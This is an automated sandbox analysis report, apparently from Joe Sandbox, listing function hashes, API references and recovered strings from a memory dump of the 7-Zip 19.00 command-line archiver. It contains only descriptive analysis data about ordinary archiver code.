                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 96405dd8fb92279f030b02bc931f9dc36b9c89402a3ea1ebc254a3a14f5713aa
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D51AE7331868596CA20EF16E8907AEB721F7D57D4F904116EF9D13B6ADF68C90ACB00
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$ErrorLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 408039514-0
                                                                                                                                                                                                                                                  • Opcode ID: 56e310f5247428a7174e856c66c809f8f157f3f47fc266d476a18a669d8f27e7
                                                                                                                                                                                                                                                  • Instruction ID: 3f81bcb19fa7050cca797cfd9bb164cb7249fe72ca91fa0da9b7f60dbb7c3eb1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 56e310f5247428a7174e856c66c809f8f157f3f47fc266d476a18a669d8f27e7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B6517A2322C90092DA20EF65E49176EE760FBD5794F909222F79E436B9DF68CD47CB10
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: fputs
                                                                                                                                                                                                                                                  • String ID: = $ERROR$ERRORS:$WARNING$WARNINGS:
                                                                                                                                                                                                                                                  • API String ID: 1795875747-2836439314
                                                                                                                                                                                                                                                  • Opcode ID: bfaef9fa8df0d205eec04fe16e9a27ef95300a9a3da73fd13572728b12155a0b
                                                                                                                                                                                                                                                  • Instruction ID: 23479dfe978b47423624f13a3e2e267cd2f7ffe9f99db87620bad2e9ddf6a347
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bfaef9fa8df0d205eec04fe16e9a27ef95300a9a3da73fd13572728b12155a0b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5611BEA670054096FB24DF2AEA987987720F748BE4F44C022CF4903A62DF38DAA8C300
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: fputs$free
                                                                                                                                                                                                                                                  • String ID: $ MB$ Memory =
                                                                                                                                                                                                                                                  • API String ID: 3873070119-2616823926
                                                                                                                                                                                                                                                  • Opcode ID: 07695d8419c59f003fa7f84926a4645375bf0ceb04becd9a3de262dbf0bc1305
                                                                                                                                                                                                                                                  • Instruction ID: 7a929cec14aaf4a1416b77334c361d7bf8f85dd0f0545f40820ac0e95cb6ebd7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 07695d8419c59f003fa7f84926a4645375bf0ceb04becd9a3de262dbf0bc1305
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A11EFA265490191EB109F29FD5435A3321F784BE5F44D222EA6E437A5DF38C555C700
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009B30E7
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009B3104
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009B3114
                                                                                                                                                                                                                                                    • Part of subcall function 00972320: free.MSVCRT ref: 0097237E
                                                                                                                                                                                                                                                    • Part of subcall function 00972320: fputs.MSVCRT ref: 009723B8
                                                                                                                                                                                                                                                    • Part of subcall function 00972320: free.MSVCRT ref: 009723C4
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009B3132
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: fputs$free
                                                                                                                                                                                                                                                  • String ID: : Can not open the file as [$ERROR$Open $WARNING$] archive
                                                                                                                                                                                                                                                  • API String ID: 3873070119-2741933734
                                                                                                                                                                                                                                                  • Opcode ID: f32defa99fa0ddd8f5ee8d7903e4695ca461ad93e2af0abed86e02622ffafdb7
                                                                                                                                                                                                                                                  • Instruction ID: 242ddffd7f437842f222241ac4dd648cc55cff84732719423735c4951f196a47
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f32defa99fa0ddd8f5ee8d7903e4695ca461ad93e2af0abed86e02622ffafdb7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14F037A6740A0591FE109B6AFDA87997361BB99FD4F84D022DE5E033629F2CC949C300
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: c6c1dfda41fa0d06ad42f95544832c1263e566194fcfacdfad1f80fd41ef587c
                                                                                                                                                                                                                                                  • Instruction ID: 5f33fb62ffa78d58b4cbaa05b447574121daf54f113140f336ff20be3dd29501
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c6c1dfda41fa0d06ad42f95544832c1263e566194fcfacdfad1f80fd41ef587c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17E17936325B8096CB64DF26E4A476E77A4F78AB84F548422EB8E43725DF38C855C780
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00976F6D
                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00976F78
                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00976F85
                                                                                                                                                                                                                                                    • Part of subcall function 0097339C: free.MSVCRT ref: 009733D7
                                                                                                                                                                                                                                                    • Part of subcall function 0097339C: memmove.MSVCRT(00000000,?,?,00000000,009710A8), ref: 009733F2
                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00977023
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32 ref: 0097705C
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00977086
                                                                                                                                                                                                                                                    • Part of subcall function 00976C84: CreateDirectoryW.KERNEL32 ref: 00976CA8
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CountCurrentErrorLastTick$CreateDirectoryProcessThreadfreememmove
                                                                                                                                                                                                                                                  • String ID: .tmp$d
                                                                                                                                                                                                                                                  • API String ID: 3444860307-2797371523
                                                                                                                                                                                                                                                  • Opcode ID: 855db8f89ad4192e1f7aaf537696d0c704f64e19782212e671a724ccd2b912be
                                                                                                                                                                                                                                                  • Instruction ID: 7527e386fe5b5a2ed241510d2ce46c7cc183efa8a1b67e566c2be7ac8a1315dd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 855db8f89ad4192e1f7aaf537696d0c704f64e19782212e671a724ccd2b912be
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 80314227218250D6DB24AB66F85076DF361BB90BC4F44C522DF8A47B21DB38C882C701
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$AddressHandleModuleProc
                                                                                                                                                                                                                                                  • String ID: CreateHardLinkW$kernel32.dll
                                                                                                                                                                                                                                                  • API String ID: 399046674-294928789
                                                                                                                                                                                                                                                  • Opcode ID: 0711bf2b160802de48a7ad8e62ea8a456af0d095c717e74070ad8e7392e23327
                                                                                                                                                                                                                                                  • Instruction ID: 86a06abfc9834b5f6d865dc9a3afd8545d14f68ff04d6c1fd1ed8d06793ef33d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0711bf2b160802de48a7ad8e62ea8a456af0d095c717e74070ad8e7392e23327
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA21C72331994051DE61EB26EC527AF6714EBC37E0F889235BEAE87765DE28CC46C610
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: 4a8c016d17941940ccb69cce4f22d951ccabf5595733c0ae8ca37ad45cd0dd66
                                                                                                                                                                                                                                                  • Instruction ID: a5855f53545ea30505d1c6b38627b8e0e37cc9f648fa0b9e1c2c65b6ef8b2e01
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4a8c016d17941940ccb69cce4f22d951ccabf5595733c0ae8ca37ad45cd0dd66
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2251A623229A4095CA21EF26E85026B7770FBC9BE4B988225FF5E47765EF38C542C700
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: 4f627721fd3f548a9e12361352d12e7f0c520e4151b4dacedd918d3c46c14af4
                                                                                                                                                                                                                                                  • Instruction ID: 767c6478416cc6cdbf0e5ed69e5abc44368157e9bf721227b6d26d693850bc4b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f627721fd3f548a9e12361352d12e7f0c520e4151b4dacedd918d3c46c14af4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5941703361898086CB70BF16E88026D6B65F7857A4F994236EE5E17B95DB38C882C740
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 7339f14c52790c104396c75c90f75acb671024a89b4c5f409cc22bad2f54e61d
                                                                                                                                                                                                                                                  • Instruction ID: 6c31386974d6953ccf4a744f9024ae214ebb91a54dcfca27f4c7fd98042c23e0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7339f14c52790c104396c75c90f75acb671024a89b4c5f409cc22bad2f54e61d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA919B33319A4086CB20DF25E49075EB374F7C2BA4F919616EA9E47768DF78C845CB90
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: d553175bd705add0397085a2f68dee216f55efb8e0660d055bcfc610d1b73714
                                                                                                                                                                                                                                                  • Instruction ID: f85d903984dc3de1e8721747d931c574b4796a7b41ebe68438195bb039a8468c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d553175bd705add0397085a2f68dee216f55efb8e0660d055bcfc610d1b73714
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 12514967219AC485CA20DF2AE49079E7765F7CAF88F409012DF8E67B29CF39C456CB14
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: 9943e524698941380e30c423019f5bc2cf16f063716f467c35492b6a2cf77687
                                                                                                                                                                                                                                                  • Instruction ID: e1febf03976fb56f5adc4ba450fc5901128d7b0c7ea4dcd527e116f44113bc11
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9943e524698941380e30c423019f5bc2cf16f063716f467c35492b6a2cf77687
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C41F4B7219F8482CA24DF2AE8903AE6365FBCAF94F459422DB4E53725DF38C495C304
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: 49e297252a2c8ca67cda62bdf5dff8c128a9f435b231509b57c7dc761cb252a3
                                                                                                                                                                                                                                                  • Instruction ID: 696a441aae0ba3f8b687462bc6f06e70cdd0314230ea1426b938ee9ebc196d87
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 49e297252a2c8ca67cda62bdf5dff8c128a9f435b231509b57c7dc761cb252a3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A911462361688488CB11AF27DD513E86225EBC6FA8F5D8176AF2D2B359DE24D8428360
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$memmove
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1534225298-0
                                                                                                                                                                                                                                                  • Opcode ID: 37bd50d8d1977fdd302a0b82f53c3d6d511d758968c823be9149fe37c82b5d04
                                                                                                                                                                                                                                                  • Instruction ID: 71dc30ebb368094b37d0fa142afdb208ac9e6e4a62e8d765ee3e7e1fd6273744
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 37bd50d8d1977fdd302a0b82f53c3d6d511d758968c823be9149fe37c82b5d04
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8010C2332594492CA14EF27DE9166C7320FBC5F947848162AF2E4BB65DF20D866C364
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID: /$\$a$z
                                                                                                                                                                                                                                                  • API String ID: 1294909896-3795456795
                                                                                                                                                                                                                                                  • Opcode ID: 92741b9c6097dc57a5422346ae12ec5673efaeb8d1b2f3031f7aecb4c5395baf
                                                                                                                                                                                                                                                  • Instruction ID: d6482d6331336b4bcdb5ecfa498b136f07dfc310ef93dae12e89c160dd21e333
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 92741b9c6097dc57a5422346ae12ec5673efaeb8d1b2f3031f7aecb4c5395baf
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90410383E0024499DB30EF21D4046B93768F353B98F8D5226EB95033A4EB79C9C5D7C1
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values, xrefs: 009B878E
                                                                                                                                                                                                                                                  • 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21, xrefs: 009B877E
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$fputs
                                                                                                                                                                                                                                                  • String ID: 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21$Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values
                                                                                                                                                                                                                                                  • API String ID: 2444650769-4238946813
